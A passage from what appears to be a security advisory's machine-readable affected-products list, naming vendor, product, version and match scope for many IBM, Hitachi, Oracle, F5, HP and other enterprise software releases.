model: "tiered storage manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.0.0-00", }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.2-01", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-08-10-07", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0.0.27", }, { model: "tiered storage manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.0.0-00", }, { model: "device manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-05", }, { model: "knowledge", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.1.7", }, { model: "websphere lombardi edition", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.1.0", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "lotus expeditor", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.2.2", }, { model: "device manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-05", }, { model: "device manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-07", }, { model: "campaign", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5", }, { model: "tivoli provisioning manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "5.1", }, { model: "arx", scope: "eq", trust: 0.3, vendor: "f5", version: "6.0", }, { model: "tivoli storage productivity center", scope: "eq", trust: 0.3, vendor: "ibm", version: "4.2.1", }, { model: "tuning manager software (linux(suse", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-00", }, { model: "websphere sensor events", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0", }, { model: "openpages", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.0.1.5", }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.1.0", }, { model: "security threat response manager", scope: "eq", trust: 0.3, vendor: "juniper", version: "2012.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "xp p9000 replication manager", scope: "eq", trust: 0.3, vendor: "hp", version: "6.0.0-00", }, { model: "connections", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.0.10", }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.2.1-00", }, { model: "qradar siem mr2", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.1", }, { model: "arx", scope: "eq", trust: 0.3, vendor: "f5", version: "6.4", }, { model: "tivoli dynamic workload console", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "big-ip edge gateway", scope: "eq", trust: 0.3, vendor: "f5", version: "11.1", }, { model: "websphere service registry and repository", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0", }, { model: "tivoli workload scheduler distributed", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.1", }, { model: "filenet p8 platform content search engine", scope: "eq", trust: 0.3, vendor: "ibm", version: "5.1", }, { model: "tivoli identity manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "5.0", }, { model: "tivoli netcool/omnibus web gui", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.4", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.1.0.35", }, { model: "tuning manager software (solaris(x6", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-05", }, { model: "tivoli composite application manager for websphere", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.1", }, { model: "tiered storage manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-08", }, { model: "ds8870", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.3", }, { model: "raplication manager software (linux(suse", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-00", }, { model: "tuning manager software )", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.001", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "qradar siem mr5", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0", }, { model: "communications webrtc session controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "arx", scope: "eq", trust: 0.3, vendor: "f5", version: "6.3", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.07", }, { model: "infosphere identity insight", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0.0.3", }, { model: "campaign", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0", }, { model: "campaign", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.3", }, { model: "retail allocation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0", }, { model: "infosphere master data management collaborative edition", scope: "eq", trust: 0.3, vendor: "ibm", version: "-10.0", }, { model: "tiered storage manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.1.1-00", }, { model: "qradar siem mr2", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.2", }, { model: "device manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-08", }, { model: "device manager software", scope: "ne", trust: 0.3, vendor: "hitachi", version: "8.0.0-06", }, { model: "business process manager express", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "endpoint manager for remote control", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.1.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.1.0.39", }, { model: "vcenter server", scope: "eq", trust: 0.3, vendor: "vmware", version: "5.0", }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.1.0-00", }, { model: "predictive insight", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0", }, { model: "big-ip edge gateway", scope: "eq", trust: 0.3, vendor: "f5", version: "10.2.4", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0.0.23", }, { model: "social media analytics", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.2", }, { model: "device manager software (linux(sles", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-07", }, { model: "tivoli integrated portal", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.2", }, { model: "arx", scope: "eq", trust: 0.3, vendor: "f5", version: "6.2", }, { model: "tivoli workload scheduler distributed", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.4", }, { model: "campaign", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "global link manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-01", }, { model: "retail allocation", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0.0.15", }, { model: "device manager software )", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.1.1-03", }, { model: "tivoli workload scheduler z/os connector", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.1", }, { model: "application manager for smart business", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.2.1", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0.0.31", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.3.5.0", }, { model: "lotus expeditor", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.2.3", }, { model: "big-ip aam", scope: "eq", trust: 0.3, vendor: "f5", version: "11.5.1", }, { model: "device manager software (linux(rhel", scope: "ne", trust: 0.3, vendor: "hitachi", version: "8.0.0-06", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-09-00-08", }, { model: "linux ia-64", scope: "eq", trust: 0.3, vendor: "debian", version: "6.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-08-11-01", }, { model: "business process manager standard", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.0", }, { model: "big-ip edge gateway", scope: "eq", trust: 0.3, vendor: "f5", version: "11.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.3.0", }, { model: "device manager software (solaris", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.1.1-03(x64))", }, { model: "retail back office 12.0.9in", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "device manager software )", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.0-00", }, { model: "tivoli netcool configuration manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.4", }, { model: "real-time decision platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0", }, { model: "filenet content manager content engine", scope: "eq", trust: 0.3, vendor: "ibm", version: "5.2.0", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0.2", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-09-10", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-09-00-07", }, { model: "tiered storage manager software (linux(sles", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.1.0-00", }, { model: "network satellite server (for rhel", scope: "eq", trust: 0.3, vendor: "redhat", version: "6)5.5", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.1.0.31", }, { model: "filenet p8 platform content search engine", scope: "eq", trust: 0.3, vendor: "ibm", version: "4.5.1", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.05", }, { model: "infosphere master data management collaborative edition", scope: "eq", trust: 0.3, vendor: "ibm", version: "-11.0", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5.55", }, { model: "tivoli netcool configuration manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.3", }, { model: "security qradar", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.2.2", }, { model: "tivoli foundations for application manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.2", }, { model: "infosphere master data management server for product information", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "infosphere information server", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0", }, { model: "connections", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.5.0.0", }, { model: "identity manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.5", }, { model: "waveset", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.1.1", }, { model: "tivoli identity manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "5.1", }, { model: "big-ip edge gateway hf3", scope: "eq", trust: 0.3, vendor: "f5", version: "11.2", }, { model: "big-ip aam", scope: "eq", trust: 0.3, vendor: "f5", version: "11.4.0", }, { model: "network satellite server (for rhel", scope: "eq", trust: 0.3, vendor: "redhat", version: "6)5.4", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-08-11", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.24.0", }, { model: "tiered storage manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-00", }, { model: "tivoli netcool configuration manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.2", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-08-00-11", }, { model: "tivoli storage productivity center", scope: "eq", trust: 0.3, vendor: "ibm", version: "5.1.1.4", }, { model: "tuning manager software", scope: "ne", trust: 0.3, vendor: "hitachi", version: "8.0.0-06", }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.402", }, { model: "tiered storage manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.2.1-00", }, { model: "device manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.2.1-01", }, { model: "big-ip aam", scope: "eq", trust: 0.3, vendor: "f5", version: "11.4.1", }, { model: "tiered storage manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0.1-02", }, { model: "big-ip webaccelerator", scope: "eq", trust: 0.3, vendor: "f5", version: "11.2.00", }, { model: "secure analytics 2012.1r7", scope: "ne", trust: 0.3, vendor: "juniper", version: null, }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-03", }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.1-00", }, { model: "device manager software (solaris(op", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.4.0-00", }, { model: "tivoli storage productivity center", scope: "eq", trust: 0.3, vendor: "ibm", version: "5.1.1.2", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "connections", scope: "eq", trust: 0.3, vendor: "ibm", version: "5.0", }, { model: "insurance ifrs analyzer", scope: "eq", trust: 0.3, vendor: "oracle", version: "178.0.7", }, { model: "smart analytics system", scope: "eq", trust: 0.3, vendor: "ibm", version: "56001", }, { model: "financial transaction manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.1", }, { model: "tivoli storage manager administration center", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.2", }, { model: "rational insight", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.0.11", }, { model: "retail markdown optimization", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "secure analytics", scope: "eq", trust: 0.3, vendor: "juniper", version: "2013.2", }, { model: "big-ip edge gateway", scope: "eq", trust: 0.3, vendor: "f5", version: "10.2.1", }, { model: "websphere lombardi edition", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.2", }, { model: "distributed marketing", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.2", }, { model: "infosphere balanced warehouse c4000", scope: null, trust: 0.3, vendor: "ibm", version: null, }, { model: "device manager software (solaris", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.1-00(x64))", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.1.0.33", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.03", }, { model: "sitescope", scope: "eq", trust: 0.3, vendor: "hp", version: "11.24", }, { model: "rational reporting for development intelligence", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.0.5", }, { model: "websphere partner gateway express edition", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.0.0.3", }, { model: "tiered storage manager software (linux(sles", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0.1-02", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail markdown optimization", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "terasoluna server framework for java", scope: "eq", trust: 0.3, vendor: "ntt data", version: "2.0.51", }, { model: "campaign", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.3", }, { model: "distributed marketing", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.1", }, { model: "tiered storage manager software (linux(sles", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-08", }, { model: "tivoli storage productivity center", scope: "eq", trust: 0.3, vendor: "ibm", version: "4.2.2.177", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.1.0.45", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.01", }, { model: "big-ip webaccelerator", scope: "eq", trust: 0.3, vendor: "f5", version: "11.2.1", }, { model: "connections", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.0.0.0", }, { model: "tuning manager software (linux(suse", scope: "ne", trust: 0.3, vendor: "hitachi", version: "8.0.0-06", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.1.0", }, { model: "communications metasolv solution", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.10.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "filenet p8 platform content search engine", scope: "eq", trust: 0.3, vendor: "ibm", version: "5.0", }, { model: "raplication manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-00", }, { model: "linux amd64", scope: "eq", trust: 0.3, vendor: "debian", version: "6.0", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "big-ip edge gateway hf2", scope: "eq", trust: 0.3, vendor: "f5", version: "11.2.1", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.06", }, { model: "portal", scope: "eq", trust: 0.3, vendor: "liferay", version: "6.2.1", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.02", }, { model: "big-ip edge gateway", scope: "eq", trust: 0.3, vendor: "f5", version: "10.1", }, { model: "business process manager standard", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5.0", }, { model: "xp7 global link manager software", scope: "eq", trust: 0.3, vendor: "hp", version: "7.6.0-02", }, { model: "secure analytics 2014.2r2", scope: "ne", trust: 0.3, vendor: "juniper", version: null, }, { model: "rational reporting for development intelligence", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.01", }, { model: "big-ip webaccelerator hf5", scope: "eq", trust: 0.3, vendor: "f5", version: "11.2.0", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.09", }, { model: "rational reporting for development intelligence", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.0.21", }, { model: "raplication manager software (linux(suse", scope: "ne", trust: 0.3, vendor: "hitachi", version: "8.0.0-06", }, { model: "tivoli integrated portal", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.1.115", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "tivoli application dependency discovery manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.2.2", }, { model: "linux mips", scope: "eq", trust: 0.3, vendor: "debian", version: "6.0", }, { model: "tiered storage manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.1.0-00", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0.0.19", }, { model: "portal 6.2.1-ce-ga2-securit", scope: null, trust: 0.3, vendor: "liferay", version: null, }, { model: "tivoli dynamic workload console", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.1", }, { model: "tiered storage manager software (linux(sles", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.3.0-00", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.2", }, { model: "big-ip edge gateway hf1", scope: "eq", trust: 0.3, vendor: "f5", version: "10.2.1", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.21.0", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0", }, { model: "struts", scope: "ne", trust: 0.3, vendor: "apache", version: "2.3.16.2", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0.0.25", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.4", }, { model: "leads", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.1", }, { model: "device manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.1.0-00", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.2.0", }, { model: "infosphere balanced warehouse d5100", scope: null, trust: 0.3, vendor: "ibm", version: null, }, { model: "tiered storage manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-05", }, { model: "security threat response manager 2013.2r8", scope: "ne", trust: 0.3, vendor: "juniper", version: null, }, { model: "tivoli system automation application manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "3.2", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5.3", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.08", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.2", }, { model: "tuning manager software )", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.401", }, { model: "big-ip webaccelerator hf3", scope: "eq", trust: 0.3, vendor: "f5", version: "11.2.1", }, { model: "business process manager advanced", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0.0", }, { model: "tivoli storage productivity center", scope: "eq", trust: 0.3, vendor: "ibm", version: "5.1.1.0", }, { model: "tiered storage manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0.0-00", }, { model: "business process manager express", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.0", }, { model: "device manager software )", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0-00", }, { model: "device manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-05", }, { model: "global link manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-00", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0.3", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "distributed marketing", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.6", }, { model: "knowledge", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.6.1", }, { model: "tiered storage manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0.0-00", }, { model: "sitescope", scope: "eq", trust: 0.3, vendor: "hp", version: "11.2", }, { model: "enterprise server x86 64", scope: "eq", trust: 0.3, vendor: "mandrakesoft", version: "5", }, { model: "raplication manager software (solaris(x6", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-05", }, { model: "connections", scope: "eq", trust: 0.3, vendor: "ibm", version: "3.0.1.0", }, { model: "campaign", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0", }, { model: "tivoli storage manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.3.0", }, { model: "security siteprotector system", scope: "eq", trust: 0.3, vendor: "ibm", version: "3.0", }, { model: "infosphere mashuphub", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.0", }, { model: "global link manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.2-01", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.04", }, { model: "device manager", scope: "eq", trust: 0.3, vendor: "hp", version: "8.0.0-00", }, { model: "raplication manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-05", }, { model: "global link manager software (solaris(x6", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-01", }, { model: "tivoli storage manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.2", }, { model: "tiered storage manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.3-00", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-08-11-07", }, { model: "big-ip edge gateway hf5", scope: "eq", trust: 0.3, vendor: "f5", version: "11.2.0", }, { model: "security siteprotector system", scope: "eq", trust: 0.3, vendor: "ibm", version: "3.1", }, { model: "device manager", scope: "eq", trust: 0.3, vendor: "hp", version: "8.0.0-06", }, { model: "vcenter server", scope: "eq", trust: 0.3, vendor: "vmware", version: "5.5", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.01", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0", }, { model: "tivoli endpoint manager for remote control", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "identity manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.22", }, { model: "enterprise linux", scope: "eq", trust: 0.3, vendor: "oracle", version: "5", }, { model: "tiered storage manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.5.0-02", }, { model: "weblogic portal", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.6.0", }, { model: "retail clearance optimization engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "tivoli storage productivity center", scope: "eq", trust: 0.3, vendor: "ibm", version: "4.2.0", }, { model: "campaign", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.2", }, { model: "sitescope monitors 11.32ip1", scope: null, trust: 0.3, vendor: "hp", version: null, }, { model: "connections", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.0.1.1", }, { model: "rational insight", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.1.13", }, { model: "enterprise server", scope: "eq", trust: 0.3, vendor: "mandrakesoft", version: "5", }, { model: "tiered storage manager software (linux(rhel", scope: "ne", trust: 0.3, vendor: "hitachi", version: "8.0.0-06", }, { model: "sitescope", scope: "eq", trust: 0.3, vendor: "hp", version: "11.11", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "websphere service registry and repository", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.3", }, { model: "tuning manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-05", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.2", }, { model: "sitescope", scope: "eq", trust: 0.3, vendor: "hp", version: "11.22", }, { model: "sitescope", scope: "eq", trust: 0.3, vendor: "hp", version: "11.1", }, { model: "business server", scope: "eq", trust: 0.3, vendor: "mandriva", version: "1x8664", }, { model: "infosphere balanced warehouse c3000", scope: null, trust: 0.3, vendor: "ibm", version: null, }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-05", }, { model: "tivoli netcool configuration manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.4.1", }, { model: "tivoli system automation application manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "3.1", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "cognos business intelligence", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.1.1", }, { model: "tiered storage manager software (linux(sles", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0.0-00", }, { model: "tivoli composite application manager for application diagnostics", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "websphere service registry and repository", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.2", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "rational insight", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.1.12", }, { model: "contact optimization", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0", }, { model: "device manager software (linux(suse", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-00", }, { model: "rational insight", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.1.11", }, { model: "retail markdown optimization", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "content collector", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.2", }, { model: "xp p9000 tiered storage manager", scope: "eq", trust: 0.3, vendor: "hp", version: "7.6.1-06", }, { model: "content analytics with enterprise search", scope: "eq", trust: 0.3, vendor: "ibm", version: "3.0", }, { model: "device manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.3-00", }, { model: "icewall configuration manager", scope: "eq", trust: 0.3, vendor: "hp", version: "3.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.02", }, { model: "arx", scope: "eq", trust: 0.3, vendor: "f5", version: "6.1.1", }, { model: "enterprise data quality", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.0.11", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.1", }, { model: "tivoli netcool/omnibus web gui", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.3.1", }, { model: "device manager software (linux(sles", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0.1-02", }, { model: "tiered storage manager software (linux(suse", scope: "ne", trust: 0.3, vendor: "hitachi", version: "8.0.0-06", }, { model: "tuning manager software )", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.2-01", }, { model: "xp7 global link manager software", scope: "eq", trust: 0.3, vendor: "hp", version: "8.0.0-00", }, { model: "business process manager express", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5.0", }, { model: "tiered storage manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-07", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5.51", }, { model: "identity manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "tuning manager software (linux(suse", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-05", }, { model: "tiered storage manager software -00", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.1.1", }, { model: "weblogic portal", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.1.0", }, { model: "tiered storage manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-07", }, { model: 